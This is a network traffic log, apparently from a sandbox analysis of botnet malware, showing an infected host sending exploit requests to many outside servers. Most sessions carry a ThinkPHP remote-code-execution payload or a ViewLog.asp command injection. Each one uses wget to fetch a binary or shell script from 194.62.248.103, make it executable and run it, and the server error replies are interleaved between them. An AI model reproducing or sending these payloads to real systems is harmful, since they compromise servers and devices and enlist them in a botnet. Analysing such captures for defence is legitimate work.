                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 35 26 23 34 36 3b 61 66 35 38 62 32 34 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 35 26 23 34 36 3b 61 66 35 38 62 32 34 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;650b1502&#46;1713105335&#46;af58b24<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;650b1502&#46;1713105335&#46;af58b24</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.233958095.216.62.16880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.259793043 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:35.583472967 CEST337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.2
                                                        Date: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.235846295.102.135.14080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.264360905 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.234864895.86.69.16080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.292629957 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.235729695.100.114.5280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.568824053 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:35.887053013 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 66 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 35 26 23 34 36 3b 35 35 63 61 66 62 33 32 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 66 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 35 26 23 34 36 3b 35 35 63 61 66 62 33 32 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4f757b5c&#46;1713105335&#46;55cafb32<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;4f757b5c&#46;1713105335&#46;55cafb32</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.234245695.216.99.18380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.587925911 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:35.908621073 CEST505INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 311
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 61 30 31 3a 34 66 39 3a 32 62 3a 31 32 63 38 3a 3a 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at 2a01:4f9:2b:12c8::2 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.235765494.121.184.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.071535110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.234568094.123.81.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.077076912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.233927862.68.136.408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.091053009 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.233803294.66.124.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.094027042 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.234295431.177.55.998080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.391839027 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.234070031.133.98.18080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.394876003 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.234111894.112.113.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.396675110 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.233498294.123.76.408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.410834074 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.233929462.68.136.408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:36.833036900 CEST268INHTTP/1.0 400 Bad Request
                                                        Server: httpd
                                                        Date: Sun, 14 Apr 2024 14:35:36 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.235407631.136.194.2558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.050369024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.224023104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.367274046 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.397583008 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.970058918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.115326881 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.235915095.216.20.778080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.057502985 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.2336820112.160.181.7480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.197999954 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:37.476835012 CEST519INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 414
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 3c 70 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 70 3e 3c 2f 68 31 3e 0a 20 20 20 20 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 26 23 78 32 37 3b 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 3a 20 26 71 75 6f 74 3b 68 69 6e 6b 5c 78 30 37 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 78 32 37 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 26 23 78 32 37 3b 20 48 54 54 50 2f 31 2e 31 26 71 75 6f 74 3b 26 23 78 32 37 3b 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1><p>Bad Request</p></h1> Invalid HTTP Version &#x27;Invalid HTTP Version: &quot;hink\x07pp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]=&#x27;wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp&#x27; HTTP/1.1&quot;&#x27; </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.2347178112.163.104.23380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.199651003 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
